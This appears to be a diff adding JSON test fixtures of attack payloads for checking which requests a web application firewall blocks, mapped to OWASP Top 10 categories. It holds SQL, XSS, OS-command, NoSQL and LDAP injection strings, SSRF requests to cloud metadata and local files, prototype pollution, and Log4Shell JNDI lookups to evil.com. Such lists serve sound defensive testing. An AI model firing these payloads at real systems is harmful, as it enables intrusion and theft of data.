"category": "WAF-Validation",
|
|
140
|
+
"crs_rule": "930130"
|
|
141
|
+
},
|
|
142
|
+
{
|
|
143
|
+
"id": "WAF-CORE-015",
|
|
144
|
+
"payload": "GET /wp-admin/",
|
|
145
|
+
"tags": ["waf-validation", "wordpress", "crs-930"],
|
|
146
|
+
"expected_block": false,
|
|
147
|
+
"severity_hint": "Low",
|
|
148
|
+
"notes": "WordPress paths - may or may not be blocked depending on config",
|
|
149
|
+
"category": "WAF-Validation"
|
|
150
|
+
}
|
|
151
|
+
]
|
|
@@ -0,0 +1,236 @@
|
|
|
1
|
+
[
|
|
2
|
+
{
|
|
3
|
+
"id": "OWASP-A01-BAC-001",
|
|
4
|
+
"payload": "GET /admin/users HTTP/1.1\r\nCookie: role=admin",
|
|
5
|
+
"tags": ["owasp-top10", "A01", "broken-access-control", "quick"],
|
|
6
|
+
"expected_block": true,
|
|
7
|
+
"severity_hint": "Critical",
|
|
8
|
+
"notes": "OWASP A01:2021 - Broken Access Control - Cookie manipulation",
|
|
9
|
+
"category": "OWASP-Top10"
|
|
10
|
+
},
|
|
11
|
+
{
|
|
12
|
+
"id": "OWASP-A01-BAC-002",
|
|
13
|
+
"payload": "GET /api/users/../../admin/config",
|
|
14
|
+
"tags": ["owasp-top10", "A01", "broken-access-control", "path-traversal", "quick"],
|
|
15
|
+
"expected_block": true,
|
|
16
|
+
"severity_hint": "Critical",
|
|
17
|
+
"notes": "OWASP A01:2021 - Path traversal to admin",
|
|
18
|
+
"category": "OWASP-Top10"
|
|
19
|
+
},
|
|
20
|
+
{
|
|
21
|
+
"id": "OWASP-A01-BAC-003",
|
|
22
|
+
"payload": "GET /api/users/123 HTTP/1.1\r\nX-User-Id: 456",
|
|
23
|
+
"tags": ["owasp-top10", "A01", "idor"],
|
|
24
|
+
"expected_block": true,
|
|
25
|
+
"severity_hint": "High",
|
|
26
|
+
"notes": "OWASP A01:2021 - IDOR via header manipulation",
|
|
27
|
+
"category": "OWASP-Top10"
|
|
28
|
+
},
|
|
29
|
+
{
|
|
30
|
+
"id": "OWASP-A02-CRYPTO-001",
|
|
31
|
+
"payload": "GET /api/data HTTP/1.1\r\nAccept-Encoding: identity\r\nCache-Control: no-store",
|
|
32
|
+
"tags": ["owasp-top10", "A02", "crypto-failures"],
|
|
33
|
+
"expected_block": false,
|
|
34
|
+
"severity_hint": "Low",
|
|
35
|
+
"notes": "OWASP A02:2021 - Testing cache headers (informational)",
|
|
36
|
+
"category": "OWASP-Top10"
|
|
37
|
+
},
|
|
38
|
+
{
|
|
39
|
+
"id": "OWASP-A03-INJ-001",
|
|
40
|
+
"payload": "GET /api/users?id=1' OR '1'='1",
|
|
41
|
+
"tags": ["owasp-top10", "A03", "injection", "sqli", "quick"],
|
|
42
|
+
"expected_block": true,
|
|
43
|
+
"severity_hint": "Critical",
|
|
44
|
+
"notes": "OWASP A03:2021 - SQL Injection",
|
|
45
|
+
"category": "OWASP-Top10"
|
|
46
|
+
},
|
|
47
|
+
{
|
|
48
|
+
"id": "OWASP-A03-INJ-002",
|
|
49
|
+
"payload": "GET /api/search?q=<script>alert('XSS')</script>",
|
|
50
|
+
"tags": ["owasp-top10", "A03", "injection", "xss", "quick"],
|
|
51
|
+
"expected_block": true,
|
|
52
|
+
"severity_hint": "Critical",
|
|
53
|
+
"notes": "OWASP A03:2021 - XSS Injection",
|
|
54
|
+
"category": "OWASP-Top10"
|
|
55
|
+
},
|
|
56
|
+
{
|
|
57
|
+
"id": "OWASP-A03-INJ-003",
|
|
58
|
+
"payload": "GET /api/exec?cmd=;cat /etc/passwd",
|
|
59
|
+
"tags": ["owasp-top10", "A03", "injection", "oscmd", "quick"],
|
|
60
|
+
"expected_block": true,
|
|
61
|
+
"severity_hint": "Critical",
|
|
62
|
+
"notes": "OWASP A03:2021 - OS Command Injection",
|
|
63
|
+
"category": "OWASP-Top10"
|
|
64
|
+
},
|
|
65
|
+
{
|
|
66
|
+
"id": "OWASP-A03-INJ-004",
|
|
67
|
+
"payload": "GET /api/query?filter={\"$where\":\"this.password.match(/.*/)\"}}",
|
|
68
|
+
"tags": ["owasp-top10", "A03", "injection", "nosql", "quick"],
|
|
69
|
+
"expected_block": true,
|
|
70
|
+
"severity_hint": "Critical",
|
|
71
|
+
"notes": "OWASP A03:2021 - NoSQL Injection",
|
|
72
|
+
"category": "OWASP-Top10"
|
|
73
|
+
},
|
|
74
|
+
{
|
|
75
|
+
"id": "OWASP-A03-INJ-005",
|
|
76
|
+
"payload": "GET /api/ldap?user=*)(uid=*))(|(uid=*",
|
|
77
|
+
"tags": ["owasp-top10", "A03", "injection", "ldap"],
|
|
78
|
+
"expected_block": true,
|
|
79
|
+
"severity_hint": "Critical",
|
|
80
|
+
"notes": "OWASP A03:2021 - LDAP Injection",
|
|
81
|
+
"category": "OWASP-Top10"
|
|
82
|
+
},
|
|
83
|
+
{
|
|
84
|
+
"id": "OWASP-A04-DESIGN-001",
|
|
85
|
+
"payload": "POST /api/transfer HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"amount\":-1000,\"to\":\"attacker\"}",
|
|
86
|
+
"tags": ["owasp-top10", "A04", "insecure-design"],
|
|
87
|
+
"expected_block": true,
|
|
88
|
+
"severity_hint": "High",
|
|
89
|
+
"notes": "OWASP A04:2021 - Negative amount bypass",
|
|
90
|
+
"category": "OWASP-Top10"
|
|
91
|
+
},
|
|
92
|
+
{
|
|
93
|
+
"id": "OWASP-A05-MISCONFIG-001",
|
|
94
|
+
"payload": "GET /.git/config",
|
|
95
|
+
"tags": ["owasp-top10", "A05", "security-misconfiguration", "quick"],
|
|
96
|
+
"expected_block": true,
|
|
97
|
+
"severity_hint": "High",
|
|
98
|
+
"notes": "OWASP A05:2021 - Git config exposure",
|
|
99
|
+
"category": "OWASP-Top10"
|
|
100
|
+
},
|
|
101
|
+
{
|
|
102
|
+
"id": "OWASP-A05-MISCONFIG-002",
|
|
103
|
+
"payload": "GET /.env",
|
|
104
|
+
"tags": ["owasp-top10", "A05", "security-misconfiguration", "quick"],
|
|
105
|
+
"expected_block": true,
|
|
106
|
+
"severity_hint": "Critical",
|
|
107
|
+
"notes": "OWASP A05:2021 - Environment file exposure",
|
|
108
|
+
"category": "OWASP-Top10"
|
|
109
|
+
},
|
|
110
|
+
{
|
|
111
|
+
"id": "OWASP-A05-MISCONFIG-003",
|
|
112
|
+
"payload": "GET /server-status",
|
|
113
|
+
"tags": ["owasp-top10", "A05", "security-misconfiguration"],
|
|
114
|
+
"expected_block": true,
|
|
115
|
+
"severity_hint": "Medium",
|
|
116
|
+
"notes": "OWASP A05:2021 - Server status page",
|
|
117
|
+
"category": "OWASP-Top10"
|
|
118
|
+
},
|
|
119
|
+
{
|
|
120
|
+
"id": "OWASP-A05-MISCONFIG-004",
|
|
121
|
+
"payload": "GET /phpinfo.php",
|
|
122
|
+
"tags": ["owasp-top10", "A05", "security-misconfiguration"],
|
|
123
|
+
"expected_block": true,
|
|
124
|
+
"severity_hint": "Medium",
|
|
125
|
+
"notes": "OWASP A05:2021 - PHP info exposure",
|
|
126
|
+
"category": "OWASP-Top10"
|
|
127
|
+
},
|
|
128
|
+
{
|
|
129
|
+
"id": "OWASP-A06-VULN-001",
|
|
130
|
+
"payload": "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; Nessus SOAP)",
|
|
131
|
+
"tags": ["owasp-top10", "A06", "vulnerable-components"],
|
|
132
|
+
"expected_block": true,
|
|
133
|
+
"severity_hint": "Medium",
|
|
134
|
+
"notes": "OWASP A06:2021 - Vulnerability scanner detection",
|
|
135
|
+
"category": "OWASP-Top10"
|
|
136
|
+
},
|
|
137
|
+
{
|
|
138
|
+
"id": "OWASP-A06-VULN-002",
|
|
139
|
+
"payload": "GET /cgi-bin/test.cgi",
|
|
140
|
+
"tags": ["owasp-top10", "A06", "vulnerable-components"],
|
|
141
|
+
"expected_block": true,
|
|
142
|
+
"severity_hint": "Medium",
|
|
143
|
+
"notes": "OWASP A06:2021 - Legacy CGI access",
|
|
144
|
+
"category": "OWASP-Top10"
|
|
145
|
+
},
|
|
146
|
+
{
|
|
147
|
+
"id": "OWASP-A07-AUTH-001",
|
|
148
|
+
"payload": "POST /api/login HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"username\":\"admin\",\"password\":\"admin\"}",
|
|
149
|
+
"tags": ["owasp-top10", "A07", "auth-failures"],
|
|
150
|
+
"expected_block": false,
|
|
151
|
+
"severity_hint": "Low",
|
|
152
|
+
"notes": "OWASP A07:2021 - Default credentials (app should reject)",
|
|
153
|
+
"category": "OWASP-Top10"
|
|
154
|
+
},
|
|
155
|
+
{
|
|
156
|
+
"id": "OWASP-A08-INTEGRITY-001",
|
|
157
|
+
"payload": "POST /api/update HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"__proto__\":{\"isAdmin\":true}}",
|
|
158
|
+
"tags": ["owasp-top10", "A08", "software-data-integrity", "quick"],
|
|
159
|
+
"expected_block": true,
|
|
160
|
+
"severity_hint": "Critical",
|
|
161
|
+
"notes": "OWASP A08:2021 - Prototype pollution",
|
|
162
|
+
"category": "OWASP-Top10"
|
|
163
|
+
},
|
|
164
|
+
{
|
|
165
|
+
"id": "OWASP-A08-INTEGRITY-002",
|
|
166
|
+
"payload": "POST /api/deserialize HTTP/1.1\r\nContent-Type: application/x-java-serialized-object",
|
|
167
|
+
"tags": ["owasp-top10", "A08", "software-data-integrity"],
|
|
168
|
+
"expected_block": true,
|
|
169
|
+
"severity_hint": "Critical",
|
|
170
|
+
"notes": "OWASP A08:2021 - Java deserialization",
|
|
171
|
+
"category": "OWASP-Top10"
|
|
172
|
+
},
|
|
173
|
+
{
|
|
174
|
+
"id": "OWASP-A09-LOGGING-001",
|
|
175
|
+
"payload": "GET /api/search?q=${jndi:ldap://evil.com/a}",
|
|
176
|
+
"tags": ["owasp-top10", "A09", "logging-failures", "log4shell", "quick"],
|
|
177
|
+
"expected_block": true,
|
|
178
|
+
"severity_hint": "Critical",
|
|
179
|
+
"notes": "OWASP A09:2021 - Log4Shell attack",
|
|
180
|
+
"category": "OWASP-Top10"
|
|
181
|
+
},
|
|
182
|
+
{
|
|
183
|
+
"id": "OWASP-A09-LOGGING-002",
|
|
184
|
+
"payload": "GET /api/test?id=1 HTTP/1.1\r\nX-Forwarded-For: ${jndi:rmi://evil.com/a}",
|
|
185
|
+
"tags": ["owasp-top10", "A09", "logging-failures", "log4shell"],
|
|
186
|
+
"expected_block": true,
|
|
187
|
+
"severity_hint": "Critical",
|
|
188
|
+
"notes": "OWASP A09:2021 - Log4Shell in header",
|
|
189
|
+
"category": "OWASP-Top10"
|
|
190
|
+
},
|
|
191
|
+
{
|
|
192
|
+
"id": "OWASP-A10-SSRF-001",
|
|
193
|
+
"payload": "GET /api/fetch?url=http://169.254.169.254/latest/meta-data/",
|
|
194
|
+
"tags": ["owasp-top10", "A10", "ssrf", "aws", "quick"],
|
|
195
|
+
"expected_block": true,
|
|
196
|
+
"severity_hint": "Critical",
|
|
197
|
+
"notes": "OWASP A10:2021 - AWS metadata SSRF",
|
|
198
|
+
"category": "OWASP-Top10"
|
|
199
|
+
},
|
|
200
|
+
{
|
|
201
|
+
"id": "OWASP-A10-SSRF-002",
|
|
202
|
+
"payload": "GET /api/fetch?url=http://localhost:22/",
|
|
203
|
+
"tags": ["owasp-top10", "A10", "ssrf", "quick"],
|
|
204
|
+
"expected_block": true,
|
|
205
|
+
"severity_hint": "Critical",
|
|
206
|
+
"notes": "OWASP A10:2021 - Localhost SSRF",
|
|
207
|
+
"category": "OWASP-Top10"
|
|
208
|
+
},
|
|
209
|
+
{
|
|
210
|
+
"id": "OWASP-A10-SSRF-003",
|
|
211
|
+
"payload": "GET /api/fetch?url=file:///etc/passwd",
|
|
212
|
+
"tags": ["owasp-top10", "A10", "ssrf", "lfi", "quick"],
|
|
213
|
+
"expected_block": true,
|
|
214
|
+
"severity_hint": "Critical",
|
|
215
|
+
"notes": "OWASP A10:2021 - File protocol SSRF",
|
|
216
|
+
"category": "OWASP-Top10"
|
|
217
|
+
},
|
|
218
|
+
{
|
|
219
|
+
"id": "OWASP-A10-SSRF-004",
|
|
220
|
+
"payload": "GET /api/fetch?url=http://[::1]:8080/admin",
|
|
221
|
+
"tags": ["owasp-top10", "A10", "ssrf", "ipv6"],
|
|
222
|
+
"expected_block": true,
|
|
223
|
+
"severity_hint": "Critical",
|
|
224
|
+
"notes": "OWASP A10:2021 - IPv6 localhost SSRF",
|
|
225
|
+
"category": "OWASP-Top10"
|
|
226
|
+
},
|
|
227
|
+
{
|
|
228
|
+
"id": "OWASP-A10-SSRF-005",
|
|
229
|
+
"payload": "GET /api/fetch?url=http://0177.0.0.1/admin",
|
|
230
|
+
"tags": ["owasp-top10", "A10", "ssrf", "octal"],
|
|
231
|
+
"expected_block": true,
|
|
232
|
+
"severity_hint": "Critical",
|
|
233
|
+
"notes": "OWASP A10:2021 - Octal IP SSRF bypass",
|
|
234
|
+
"category": "OWASP-Top10"
|
|
235
|
+
}
|
|
236
|
+
]
|